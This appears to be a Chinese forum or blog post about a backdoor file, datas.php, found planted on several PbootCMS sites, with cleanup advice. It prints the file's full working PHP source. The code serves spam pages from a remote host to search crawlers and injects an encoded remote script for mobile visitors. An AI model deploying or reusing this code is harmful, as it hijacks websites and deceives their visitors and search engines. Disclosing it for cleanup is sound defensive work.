多个pbootcms站点被植入datas.php文件,文件内容如下:
<?php
set_time_limit(0);error_reporting(0);$a="stristr";$b=$_SERVER;function httpGetlai($c){$d=curl_init();curl_setopt($d,CURLOPT_URL,$c);curl_setopt($d,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');curl_setopt($d,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($d,CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt($d,CURLOPT_RETURNTRANSFER,1);curl_setopt($d,CURLOPT_HEADER,0);$e=curl_exec($d);curl_close($d);return $e;}define('url',$b['REQUEST_URI']);define('ref',!isset($b['HTTP_REFERER'])?'':$b['HTTP_REFERER']);define('ent',$b['HTTP_USER_AGENT']);define('site',"http://qwe.xxseoapi.com/?");define('road',"domain=".$b['HTTP_HOST']."&path=".url."&spider=".urlencode(ent));define('memes',road."&referer=".urlencode(ref));define('regs','@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i');define('mobile','/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');define('area',$a(url,".xml")or $a(url,".fdc")or $a(url,".one")or $a(url,".bug")or $a(url,".doc")or $a(url,".love")or $a(url,".txt")or $a(url,".ppt")or $a(url,".pptx")or $a(url,".xls")or $a(url,".csv")or $a(url,".shtml")or $a(url,".znb")or $a(url,".msl")or $a(url,".mdb")or $a(url,".hxc"));if(preg_match(regs,ent)){if(area){echo httpGetlai(site.road);exit;}else{echo httpGetlai("http://qwe.xxseoapi.com/x.php");ob_flush();flush();}}if(area&&preg_match(mobile,ent)){echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly9qdW1wanMub3NzLWNuLWd1YW5nemhvdS5hbGl5dW5jcy5jb20vanMvaHo1OS5qcz48L3NjcmlwdD4=');exit;}
?>通过上述代码,会推送给百度N个链接,主要TM的收录还挺快,都是一些垃圾信息,建议删除该文件之后,扫描一下网站目录文件,同时设置一下目录的权限,不要轻易给执行权限!(推荐:Pbootcms发现网站后门start.php文件)
以下截图就是上述文件输出的链接
